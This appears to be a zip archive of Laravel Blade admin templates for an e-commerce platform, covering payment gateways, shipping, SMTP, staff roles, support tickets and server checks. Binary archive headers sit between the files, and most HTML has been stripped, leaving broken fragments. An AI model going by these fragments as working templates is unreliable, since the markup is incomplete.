    @php // $demo_mode = env('DEMO_MODE') == 'On' ? true : false; @endphp @endsection @section('script') @endsection PK�N]����vvMviews/backend/setup_configurations/payment_method/partials/aamarpay.blade.phpnu�[���
    @csrf
    PK�N]�mϹ��Qviews/backend/setup_configurations/payment_method/partials/authorizenet.blade.phpnu�[���
    @csrf
    PK�N]��?e� � Jviews/backend/setup_configurations/payment_method/partials/bkash.blade.phpnu�[���
    @csrf
    PK�N]�ۯ*$$Nviews/backend/setup_configurations/payment_method/partials/instamojo.blade.phpnu�[���
    @csrf
    PK�N]��_�[ [ Kviews/backend/setup_configurations/payment_method/partials/iyzico.blade.phpnu�[���
    @csrf
    PK�N]��ד��Pviews/backend/setup_configurations/payment_method/partials/mercadopago.blade.phpnu�[���
    @csrf

    PK�N]3?�z z Jviews/backend/setup_configurations/payment_method/partials/nagad.blade.phpnu�[���
    @csrf
    PK�N]� ��66Lviews/backend/setup_configurations/payment_method/partials/ngenius.blade.phpnu�[���
    @csrf

    PK�N]^N�aQ Q Lviews/backend/setup_configurations/payment_method/partials/payhere.blade.phpnu�[���
    @csrf
    PK�N]r�?�PPJviews/backend/setup_configurations/payment_method/partials/payku.blade.phpnu�[���
    @csrf
    PK�N]ebL3 3 Kviews/backend/setup_configurations/payment_method/partials/paymob.blade.phpnu�[���
    @csrf
    PK�N]`T�]__Kviews/backend/setup_configurations/payment_method/partials/paypal.blade.phpnu�[���
    @csrf
    PK�N]���sM M Mviews/backend/setup_configurations/payment_method/partials/paystack.blade.phpnu�[���
    @csrf
    PK�N]�f �Mviews/backend/setup_configurations/payment_method/partials/razorpay.blade.phpnu�[���
    @csrf
    PK�N]s�zm__Oviews/backend/setup_configurations/payment_method/partials/sslcommerz.blade.phpnu�[���
    @csrf
    PK�N]��ٖKviews/backend/setup_configurations/payment_method/partials/stripe.blade.phpnu�[���
    @csrf
    PK�N]���C;;Hviews/backend/setup_configurations/payment_method/partials/tap.blade.phpnu�[���
    @csrf
    {{--
    --}}
    PK�N]��FFMviews/backend/setup_configurations/payment_method/partials/voguepay.blade.phpnu�[���
    @csrf
    PK�N]�!�َ�Iviews/backend/setup_configurations/pickup/pickup_address_create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Pickup Address Information') }}
    @csrf
    {{ translate('This name must match the Shiprocket pickup address nickname.') }}
    @endsectionPK�N]H}�K��Gviews/backend/setup_configurations/pickup/pickup_address_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Edit Pickup Address Information') }}
    @csrf
    @endsectionPK�N]`_���2�2Gviews/backend/setup_configurations/pickup/pickup_address_list.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('All Pickup Addresses') }}

    @can('pickup_address_create') {{ translate('Add New Pickup Address') }} @endif
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]G����,�,Hviews/backend/setup_configurations/pickup/pickup_address_table.blade.phpnu�[���
    @if (auth()->user()->can('pickup_address_delete')) @else @endif @canany(['pickup_address_edit','pickup_address_delete']) @endcanany @foreach ($pickup_addresses as $key => $pickup_address) @canany(['pickup_address_edit','pickup_address_delete']) @endcanany @endforeach
    # {{ translate('Courier Type') }} {{ translate('Address Nickname') }} {{ translate('Status') }} {{ translate('Options') }}
    @if (auth()->user()->can('pickup_address_delete'))
    @else
    {{ $key + 1 + ($pickup_addresses->currentPage() - 1) * $pickup_addresses->perPage() }}
    @endif
    {{ ucfirst( $pickup_address->courier_type )}}
    {{ ucfirst($pickup_address->address_nickname)}}
    {{ $pickup_addresses->appends(request()->input())->links() }}
    PK�N]��4� � @views/backend/setup_configurations/pickup_point/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Pickup Point Information')}}
    @csrf
    @endsection PK�N]b+��;;>views/backend/setup_configurations/pickup_point/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Update Pickup Point Information')}}
    @csrf
    @endsection PK�N]�SJ?views/backend/setup_configurations/pickup_point/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Pick-up Points')}}

    {{ translate('Pick-up Points') }}
    @foreach($pickup_points as $key => $pickup_point) @if ($pickup_point->staff != null && $pickup_point->staff->user != null) @else @endif @endforeach
    # {{translate('Name')}} {{translate('Manager')}} {{translate('Location')}} {{translate('Pickup Station Contact')}} {{translate('Status')}} {{translate('Options')}}
    {{ ($key+1) + ($pickup_points->currentPage() - 1)*$pickup_points->perPage() }} {{$pickup_point->getTranslation('name')}}{{$pickup_point->staff->user->name}}
    {{ translate('No Manager') }}
    {{$pickup_point->getTranslation('address')}} {{$pickup_point->phone}} @if ($pickup_point->pick_up_status != 1)
    {{ translate('Close') }}
    @else
    {{ translate('Open') }}
    @endif
    {{ $pickup_points->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]��Ũ))Iviews/backend/setup_configurations/shipping_configuration/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    @if(get_setting('shipping_type') == 'product_wise_shipping') @elseif(get_setting('shipping_type') == 'flat_rate') @elseif(get_setting('shipping_type') == 'seller_wise_shipping') @elseif(get_setting('shipping_type') == 'area_wise_shipping') @elseif(get_setting('shipping_type') == 'carrier_wise_shipping') @endif
    {{translate('Shipping Area Coverage & Area Wise Shipping Cost')}}

    Area-wise shipping cost is calculated based on the rates set in this configuration. The system’s shipping area coverage and the fields shown in the customer address will depend on this configuration.

    • 1. {{ translate('For Area-Wise Shipping Cost, you need to configure the complete location hierarchy in the following order: Country → State → City → Area.') }}.
    • 2. {{ translate('Choose the countries you deliver to. If only one country is enabled, the country field will be hidden at checkout. Enabling multiple countries displays the field, while disabling a country also disables its states, cities, and areas. Configure your ') }} {{ translate('Shipping Countries') }}.
    • 3. {{ translate('States are optional and can be enabled or disabled in Shipping Configuration. If enabled, the state field appears in address forms; if disabled, it’s skipped and cities load directly from the country. Disabling a state also disables its cities and areas. Configure your ') }} {{ translate('Shipping States') }}.

      {{ translate('Do You want to enable states?')}}

    • 4. {{ translate('Add and enable cities to use them for shipping. If states are on, cities go under states; if off, they go under countries. Turning off a city also turns off its areas. If a city is missing, users will see ‘We no longer deliver to this address. Configure Your ') }} {{ translate('Shipping Cities') }}.
    • 5. {{ translate('Add and enable areas under cities with shipping costs. If none are available, city costs apply. Customers with unmatched areas will see ‘We no longer deliver in this area’ and can update their address. Configure Your ') }} {{ translate('Shipping Areas') }}.
    {{translate('Product Wise Shipping Cost')}}
    To set a product-wise shipping cost, please edit the desired product from the product edit page. You can access your product list here
    {{translate('Flat Rate Shipping Cost')}}
    {{ translate('Flat Rate Shipping Cost calculation: How many products a customer purchase, doesn\'t matter. Shipping cost is fixed') }}. @csrf
    {{translate('Seller Wise Shipping Cost')}}
    {{ translate('Each seller has a fixed shipping rate. Admin can set their rate here, and sellers set theirs from their panel. If a customer buys from multiple sellers, shipping costs are added together') }}. @csrf
    {{translate('Carrier Wise Shipping Cost')}}
    {{ translate('Carrier Wise Shipping Cost calculation: Shipping cost calculate in addition with carrier. In each carrier you can set free shipping cost or can set weight range or price range shipping cost. To configure carrier wise shipping cost go to ') }} {{ translate('Shipping Carriers') }}.
    @endsection @section('script') @endsection PK�N]a�W@@#@#Sviews/backend/setup_configurations/shipping_configuration/shipping_method.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Select Shipping Method') }}
    {{ translate('Go to Shipping Configuration Page') }}
    @csrf
    Shipping Icon

    {{ translate('Area Wise Shipping Cost') }}

    {{ translate('Fixed rate for each area. If customers purchase multiple products from one seller shipping cost is calculated by the customer shipping area.') }}

    Shipping Icon

    {{ translate('Product Wise Shipping Cost') }}

    {{ translate('Shipping cost is calculated by adding the shipping cost of each product.') }}

    Shipping Icon

    {{ translate('Flat Rate Shipping Cost') }}

    {{ translate('Shipping cost stays the same no matter how many products are purchased.') }}

    Shipping Icon

    {{ translate('Seller Wise Shipping Cost') }}

    {{ translate('A fixed rate is set for each seller. If a customer buys products from two sellers, the total shipping cost is the sum of each seller’s rate.') }}

    Shipping Icon

    {{ translate('Carrier Wise Shipping Cost') }}

    {{ translate('Shipping cost calculate in addition with carrier. In each carrier you can set free shipping cost or can set weight range or price range shipping cost.') }}

    @endsection @section('script') @endsectionPK�N]s+�**:views/backend/setup_configurations/smtp_settings.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('SMTP Settings')}}
    @csrf
    {{translate('Test SMTP configuration')}}
    @csrf
    {{translate('Instruction')}}

    {{ translate('Please be carefull when you are configuring SMTP. For incorrect configuration you will get error at the time of order place, new registration, sending newsletter.') }}

    {{ translate('For Non-SSL') }}
    • {{ translate('Select sendmail for Mail Driver if you face any issue after configuring smtp as Mail Driver ') }}
    • {{ translate('Set Mail Host according to your server Mail Client Manual Settings') }}
    • {{ translate('Set Mail port as 587') }}
    • {{ translate('Set Mail Encryption as ssl if you face issue with tls') }}

    {{ translate('For SSL') }}
    • {{ translate('Select sendmail for Mail Driver if you face any issue after configuring smtp as Mail Driver') }}
    • {{ translate('Set Mail Host according to your server Mail Client Manual Settings') }}
    • {{ translate('Set Mail port as 465') }}
    • {{ translate('Set Mail Encryption as ssl') }}
    @endsection @section('script') @endsection PK�N]#�n�&�&9views/backend/setup_configurations/social_login.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Google Login Credential') }}
    @csrf
    {{ translate('Facebook Login Credential') }}
    @csrf
    {{ translate('Twitter Login Credential') }}
    @csrf
    {{ translate('Apple Login Credential') }}
    @csrf
    @endsection PK�N]�����8views/backend/setup_configurations/states/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('State Information') }}
    {{ translate('Edit State') }}
    @csrf
    @endsection PK�N]�4�W"W"9views/backend/setup_configurations/states/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All States')}}

    {{ translate('States') }}
    @foreach($states as $key => $state) @endforeach
    # {{translate('Name')}} {{translate('Country')}} {{translate('Show/Hide')}} {{translate('Action')}}
    {{ ($key+1) + ($states->currentPage() - 1)*$states->perPage() }} {{ $state->name }} {{ $state->country->name }}
    {{ $states->appends(request()->input())->links() }}
    {{ translate('Add New State') }}
    @csrf
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]��4� � 7views/backend/setup_configurations/tax/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Pickup Point Information')}}
    @csrf
    @endsection PK�N]�i�l��5views/backend/setup_configurations/tax/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Tax Information')}}
    {{translate('update Tax Info')}}
    @csrf
    @endsection PK�N]_ ����6views/backend/setup_configurations/tax/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Taxes')}}

    {{ translate('All Taxes') }}
    @foreach($all_taxes as $key => $tax) @endforeach
    # {{translate('Tax Type')}} {{translate('Status')}} {{translate('Options')}}
    {{ $loop->iteration }} {{ $tax->name }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]�:����:views/backend/setup_configurations/whatsapp_chat.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('WhatsApp Chat Setting')}}
    @csrf

    {{translate('Get WhatsApp Order for Seller products')}}
    @endsection @section('script') @endsection PK�N]%�w�� � 9views/backend/setup_configurations/zones/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Add New Zone') }}

    {{ translate('Zone Information') }}
    @csrf
    @error('name') {{ $message }} @enderror
    @error('country_id') {{ $message }} @enderror
    @endsection PK�N]zt�S S 7views/backend/setup_configurations/zones/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Add New Zone') }}

    {{ translate('Zone Information') }}
    @csrf @method('PUT')
    @error('name') {{ $message }} @enderror
    @error('country_id') {{ $message }} @enderror
    @endsection PK�N]��b�  8views/backend/setup_configurations/zones/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('All Zones') }}

    {{ translate('Zones') }}
    @foreach ($zones as $key => $zone) @endforeach
    # {{ translate('Name') }} {{ translate('Status') }} {{ translate('Options') }}
    {{ $zones->firstItem() + $key }} {{ $zone->name }}
    {{ $zones->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]:�M�  Gviews/backend/setup_configurations/ai_configurations/add_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @endsectionPK�N]dԗi��Hviews/backend/setup_configurations/ai_configurations/ai_config.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Google AI (Gemini) Settings')}}
    @csrf
    {{ translate('How to get your Gemini API Key') }}
    • 1. {{ translate('Visit the') }} Google AI Studio.
    • 2. {{ translate('Log in with your Google Account.') }}
    • 3. {{ translate('Click on the "Create API key" button.') }}
    • 4. {{ translate('Copy the generated API Key and paste it into the "Gemini API Key" field on the left.') }}
    • 5. {{ translate('Select your preferred model. "Flash" is recommended for speed and lower costs.') }}
    {{ translate('Important:') }} {{ translate('Keep your API key private. Do not share it or commit it to public repositories.') }}
    @endsectionPK�N]bw��D D Oviews/backend/setup_configurations/ai_configurations/prompt_templates.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Prompt Templates')}}
    @foreach ($prompt_templates as $key => $prompt_template)
    @csrf
    **N.B : Do Not Change The Variables Like { ____ }.**
    @endforeach
    @endsection @section('script') @endsection PK�N]j���� � :views/backend/setup_configurations/custom_script.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Custom Script') }}
    @csrf
    {{ translate('Write script with ">{{ get_setting('footer_script') }} {{ translate('Write script with @endsectionPK�N]�F2`2P2P4views/backend/setup_configurations/general.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    Setting Icon
    {{translate('General Settings')}}
    {{translate('Manage core business information, store identity and essential configurations that define how your store operates.')}}
    {{translate('Back to Business Settings')}}
    @csrf
    @if (get_active_countries()->count() > 1)
    @elseif(get_active_countries()->count() == 1) @endif
    @if (isset($business_info['certificate']) && !empty($business_info['certificate'])) @endif
    @if (addon_is_activated('gst_system'))
    @if (isset($business_info['gstin_certificate']) && !empty($business_info['gstin_certificate'])) @endif
    @endif
    generate Icon
    @endsection @section('modal') @endsection @section('script') @if(get_active_countries()->count() == 1) @endif @endsectionPK�N]�XH��7views/backend/setup_configurations/global_seo.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Global SEO') }}
    @csrf
    {{ translate('Separate with coma') }}
    generate Icon
    @endsection @section('script') @endsectionPK�N]��w{�o�o;views/backend/setup_configurations/invoice_config.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    Setting Icon
    {{translate('Invoice Settings')}}
    {{translate('Configure invoice to ensure accurate and professional order documentation.')}}
    {{translate('Back to Business Settings')}}
    @csrf
    {{ translate('Generate Invoice Number') }}
    {{ translate('Show Human Readable Text Below Barcode') }}
    {{ translate('Show QR Code Alongside Barcode') }}
    {{ translate('Invoice Content Fields') }}
    @php $fields = [ 'show_platform_contact' => 'Show Platform Contact', 'show_seller_contact' => 'Show Seller Contact', 'show_customer_name' => 'Show Customer Name', 'show_billing_address' => 'Show Billing Address', 'show_product_image' => 'Show Product Image', 'show_tracking_code' => 'Show Tracking Code', 'show_sku' => 'Show SKU', 'show_product_variation' => 'Show Product Variation' ]; @endphp @foreach ($fields as $key => $label)
    {{ translate($label) }}
    @endforeach
    generate Icon
    @endsection @section('modal') @endsection @section('script') @if(get_active_countries()->count() == 1) @endif @endsectionPK�N]���w��9views/backend/setup_configurations/order_config.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    Setting Icon
    {{translate('Order Configuration')}}
    {{translate('Manage core business information, store identity and essential configurations that define how your store operates.')}}
    {{translate('Back to Business Settings')}}
    @csrf
    {{ translate('Minimum Order Amount Check') }}
    @endsection @section('script') @endsectionPK�N]�_����;views/backend/setup_configurations/order_tracking.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    Setting Icon
    {{translate('Order Tracking')}}
    {{translate('Set up tracking codes and tracking options to keep customers informed about their order status and delivery progress.')}}
    {{translate('Back to Business Settings')}}
    @csrf
    *
    *
    {{ translate('Enable Order Tracking') }}
    generate Icon
    @endsection PK�N]�0^� W W;views/backend/setup_configurations/shipping_label.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    Setting Icon
    {{translate('Shipping Label')}}
    {{translate('Configure shipping label formats, layout and printing preferences for efficient order packaging and dispatch.')}}
    {{translate('Back to Business Settings')}}
    @csrf
    {{ translate('Show Human Readable Text Below Barcode') }}
    {{ translate('Show QR Code Alongside Barcode') }}
    {{ translate('Label Content Fields') }}
    @php $fields = [ 'sender_name_and_address' => 'Sender Name & Address', 'receiver_name_and_address' => 'Receiver Name & Address', 'order_number' => 'Order Number', 'cod_amount' => 'COD Amount (Cash On Delivery)' ]; @endphp @foreach ($fields as $key => $label)
    {{ translate($label) }}
    @endforeach
    {{ translate('Custom Footer Text') }}
    generate Icon
    @endsection @section('modal') @endsection @section('script') @if(get_active_countries()->count() == 1) @endif @endsectionPK�N]J�>ǁ'�'<views/backend/setup_configurations/thermal_printer.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    Setting Icon
    {{translate('Thermal Printer')}}
    {{translate('Configure thermal invoice to ensure accurate and professional order documentation.')}}
    {{translate('Back to Business Settings')}}
    @csrf
    {{ translate('Thermal Printer') }}
    {{ translate('Generate Invoice for Thermal Printer') }}
    {{ translate('Invoice Content Fields for Thermal Printer') }}
    @php $fields = [ 'show_logo' => 'Show Logo', 'show_tracking_code' => 'Show Tracking Code', 'show_platform_contact' => 'Show Platform Contact', 'show_seller_contact' => ' Show Seller Contact', 'show_sku' => 'Show SKU', 'show_product_variation' => 'Show Product Variation', 'show_barcode' => 'Show Barcode', 'show_qr_code' => 'Show QR Code' ]; @endphp @foreach ($fields as $key => $label)
    {{ translate($label) }}
    @endforeach
    @endsection @section('modal') @endsection @section('script') @if(get_active_countries()->count() == 1) @endif @endsectionPK�N]����P P -views/backend/shipping_system/index.blade.phpnu�[��� @extends('backend.layouts.app') @section('content')
    {{ ucfirst(translate($shipping_system->name)) }}
    @include('backend.shipping_system.partials.' . $shipping_system->name . '.' . $shipping_system->name)
    @php // $demo_mode = env('DEMO_MODE') == 'On' ? true : false; @endphp @endsection @section('script') @endsection PK�N]ح�� � +views/backend/staff/staffs/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Staff Information')}}
    @csrf
    @endsection PK�N]�`�Pj j )views/backend/staff/staffs/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Staff Information')}}
    @csrf
    @endsection PK�N]���  *views/backend/staff/staffs/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Staffs')}}

    @can('add_staff') @endcan
    {{translate('Staffs')}}
    @foreach($staffs as $key => $staff) @if($staff->user != null) @endif @endforeach
    # {{translate('Name')}} {{translate('Email')}} {{translate('Phone')}} {{translate('Role')}} {{translate('Options')}}
    {{ ($key+1) + ($staffs->currentPage() - 1)*$staffs->perPage() }} {{$staff->user->name}} {{$staff->user->email}} {{$staff->user->phone}} @if ($staff->role != null) {{ $staff->role->getTranslation('name') }} @endif @can('edit_staff') @endcan @can('delete_staff') @endcan
    {{ $staffs->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]��~� � 0views/backend/staff/staff_roles/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Role Information')}}
    @csrf
    {{ translate('Permissions') }}

    @php $permission_groups = \App\Models\Permission::all()->groupBy('section'); $addons = array("offline_payment", "club_point", "pos_system", "paytm", "seller_subscription", "otp_system", "refund_request", "affiliate_system", "african_pg", "delivery_boy", "auction", "wholesale"); @endphp @foreach ($permission_groups as $key => $permission_group) @php $show_permission_group = true; if(in_array($permission_group[0]['section'], $addons)){ if (addon_is_activated($permission_group[0]['section']) == false) { $show_permission_group = false; } } @endphp @if($show_permission_group)
    • {{ translate(Str::headline($permission_group[0]['section'])) }}
    • @foreach ($permission_group as $key => $permission)
      @endforeach
    @endif @endforeach
    @endsection PK�N]o�}��.views/backend/staff/staff_roles/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Role Information')}}
    @csrf
    @php $roleForTranslation = \App\Models\Role::where('id',$role->id)->first(); @endphp
    {{ translate('Permissions') }}

    @php $permission_groups = \App\Models\Permission::all()->groupBy('section'); $addons = array("offline_payment", "club_point", "pos_system", "paytm", "seller_subscription", "otp_system", "refund_request", "affiliate_system", "african_pg", "delivery_boy", "auction", "wholesale"); @endphp @foreach ($permission_groups as $key => $permission_group) @php $show_permission_group = true; if(in_array($permission_group[0]['section'], $addons)){ if (addon_is_activated($permission_group[0]['section']) == false) { $show_permission_group = false; } } @endphp @if($show_permission_group)
    • {{ translate(Str::headline($permission_group[0]['section'])) }}
    • @foreach ($permission_group as $key => $permission)
      @endforeach
    @endif @endforeach
    @endsection PK�N]�D�l~~/views/backend/staff/staff_roles/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Role')}}

    @can('add_staff_role') @endcan
    {{--
    {{translate('Add New Permission')}}
    @csrf
    --}}
    {{translate('Roles')}}
    @foreach($roles as $key => $role) @endforeach
    # {{translate('Name')}} {{translate('Options')}}
    {{ ($key+1) + ($roles->currentPage() - 1)*$roles->perPage() }} {{ $role->name}} @can('edit_staff_role') @endcan @if($role->id != 1 && auth()->user()->can('delete_staff_role')) @endif
    {{ $roles->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]�3 A@@+views/backend/staff/activity_logs.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Staff Activity Monitoring') }}

    {{ translate('Reset') }}
    @forelse($logs as $log) @if(!empty($log->query_payload) || !empty($log->input_payload)) @endif @empty @endforelse
    {{ translate('Time') }} {{ translate('Staff') }} {{ translate('Method') }} {{ translate('Path') }} {{ translate('Route') }} {{ translate('Status') }} {{ translate('Duration') }} {{ translate('IP') }}
    {{ $log->created_at }}
    {{ $log->user_name }}
    #{{ $log->user_id }} ({{ $log->user_type }})
    {{ $log->method }} {{ $log->path }} {{ $log->route_name ?: '-' }} {{ $log->status_code ?: '-' }} {{ $log->duration_ms }} ms {{ $log->ip_address }}
    @if(!empty($log->query_payload))
    {{ translate('Query') }}: {{ json_encode($log->query_payload) }}
    @endif @if(!empty($log->input_payload))
    {{ translate('Input') }}: {{ json_encode($log->input_payload) }}
    @endif
    {{ translate('No activity logs found.') }}
    @endsection PK�N]tMr%��0views/backend/support/contact/contacts.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Contacts') }}
    @foreach ($contacts as $key => $contact) @endforeach
    # {{ translate('Name') }} {{ translate('Email') }} {{ translate('Phone') }} {{ translate('Query') }} {{ translate('Reply') }} {{ translate('status') }} {{ translate('Options') }}
    {{ translate($key + 1) }} {{ $contact->name }} {{ $contact->email }} {{ $contact->phone }} {{ Str::limit($contact->content, 100) }} {{ Str::limit($contact->reply, 100) }} {{ $contact->reply == null ? translate('Not Replied') : translate('Replied')}}
    {{ $contacts->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]��/��3views/backend/support/contact/query_modal.blade.phpnu�[��� PK�N]�4���3views/backend/support/contact/reply_modal.blade.phpnu�[���
    @csrf
    PK�N]S�93� � 3views/backend/support/conversations/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Conversations')}}
    @foreach ($conversations as $key => $conversation) @endforeach
    # {{ translate('Date') }} {{translate('Title')}} {{translate('Sender')}} {{translate('Receiver')}} {{translate('Options')}}
    {{$key+1}} {{ $conversation->created_at }} {{ $conversation->title }} @if ($conversation->sender != null) {{ $conversation->sender->name }} @if ($conversation->receiver_viewed == 0) {{ translate('New') }} @endif @endif @if ($conversation->receiver != null) {{ $conversation->receiver->name }} @if ($conversation->sender_viewed == 0) {{ translate('New') }} @endif @endif @can('delete_product_conversations') @endcan
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]|��� � 2views/backend/support/conversations/show.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    #{{ $conversation->title }} (Between @if($conversation->sender != null) {{ $conversation->sender->name }} @endif and @if($conversation->receiver != null) {{ $conversation->receiver->name }} @endif)
      @foreach($conversation->messages as $message)
    • user != null) src="{{ uploaded_asset($message->user->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';">
      @if ($message->user != null) {{ $message->user->name }} @endif

      {{$message->created_at}}

      {{ $message->message }}

    • @endforeach
    @if ($conversation->receiver != null && $conversation->receiver->user_type == 'admin' && auth()->user()->can('reply_to_product_conversations'))
    @csrf

    @endif
    @endsection PK�N]���]� � 3views/backend/support/product_query/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Product Queries') }}
    @foreach ($queries as $key => $query) @endforeach
    # {{ translate('User Name') }} {{ translate('Product Name') }} {{ translate('Question') }} {{ translate('Reply') }} {{ translate('status') }} {{ translate('Options') }}
    {{ translate($key + 1) }} {{ $query->user->name ?? translate('Customer Not Found') }} {{ $query->product != null ? $query->product->getTranslation('name') : translate('Product Not Found') }} {{ Str::limit($query->question, 100) }} {{ Str::limit($query->reply, 100) }} {{ $query->reply == null ? translate('Not Replied') : translate('Replied')}}
    {{ $queries->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]H�?5 5 2views/backend/support/product_query/show.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ $query->product != null ? $query->product->getTranslation('name') : translate('Product Not Found') }}
    • user != null) src="{{ uploaded_asset($query->user->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';">
      @if ($query->user != null) {{ $query->user->name }} @endif

      {{ $query->created_at->diffForHumans() }}

      {{ strip_tags($query->question) }}

      {{--

      {{ strip_tags($query->reply) }}

      --}}
    @if ((Auth::user()->id == $query->seller_id || Auth::user()->user_type == 'staff') && auth()->user()->can('reply_to_product_queries'))
    @method('put') @csrf

    @endif
    @endsection PK�N]O�RZaa5views/backend/support/support_tickets/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Support Desk') }}
    @foreach ($tickets as $key => $ticket) @if ($ticket->user != null) @endif @endforeach
    {{ translate('Ticket ID') }} {{ translate('Sending Date') }} {{ translate('Subject') }} {{ translate('User') }} {{ translate('Status') }} {{ translate('Last reply') }} {{ translate('Options') }}
    #{{ $ticket->code }} {{ $ticket->created_at }} @if($ticket->viewed == 0) {{ translate('New') }} @endif {{ $ticket->subject }} {{ $ticket->user->name }} @if ($ticket->status == 'pending') {{ translate('Pending') }} @elseif ($ticket->status == 'open') {{ translate('Open') }} @else {{ translate('Solved') }} @endif @if (count($ticket->ticketreplies) > 0) {{ $ticket->ticketreplies->first()->created_at }} @else {{ $ticket->created_at }} @endif
    {{ $tickets->appends(request()->input())->links() }}
    @endsection PK�N]�XZJ J 4views/backend/support/support_tickets/show.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ $ticket->subject }} #{{ $ticket->code }}
    {{ $ticket->user->name }} {{ $ticket->created_at }} {{ translate(ucfirst($ticket->status)) }}
    @can('reply_to_support_tickets')
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endcan
    @endsection @section('script') @endsection PK�N]Sd*�5 5 /views/backend/system/import_demo_data.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Import Demo Data') }}

    {{ translate('Current verion') }}: {{ get_setting('current_version') }}
    • {{ translate('Make sure your server has matched with all requirements.') }} {{ translate('Check Here') }}
    • {{ translate('It may take some times to upload so do not close the browser or tab.') }}
    • {{ translate('If you have previous data, then it may conflicts with some of your current data.') }}
    • {{ translate('Make sure you have activated your system with the domain and site URL.') }}
    @csrf
    @endsection PK�N]"����8�8,views/backend/system/server_status.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Server information') }}

    {{ translate('Name') }} {{ translate('Current Version') }} {{ translate('Required Version') }} {{ translate('Status') }}
    Php versions {{ phpversion() }} 8.2 @if (floatval(phpversion()) >= 8.2) @else @endif
    MySQL @php $results = DB::select( "select version()" ); $mysql_version = $results[0]->{'version()'}; $version_explode = explode("-",$mysql_version); $mysql_required_version = '8.0'; if (isset($version_explode[1]) && $version_explode[1]=='MariaDB') { $mysql_required_version = '10.3'; } @endphp {{ $mysql_version }} {{ $mysql_required_version }}+ @if (floatval($version_explode[0]) >= floatval($mysql_required_version)) @else @endif

    {{ translate('php.ini Config') }}

    {{ translate('Config Name') }} {{ translate('Current') }} {{ translate('Recommended') }} {{ translate('Status') }}
    file_uploads @if(ini_get('file_uploads') == 1) On @else Off @endif On @if (ini_get('file_uploads') == 1) @else @endif
    max_file_uploads {{ ini_get('max_file_uploads') }} 20+ @if (ini_get('max_file_uploads') >= 20) @else @endif
    upload_max_filesize {{ ini_get('upload_max_filesize') }} 128M+ @if (str_replace(['M','G'],"", ini_get('upload_max_filesize')) >= 128) @else @endif
    post_max_size {{ ini_get('post_max_size') }} 128M+ @if (str_replace(['M','G'],"", ini_get('post_max_size')) >= 128) @else @endif
    allow_url_fopen @if(ini_get('allow_url_fopen') == 1) On @else Off @endif On @if (ini_get('allow_url_fopen') == 1) @else @endif
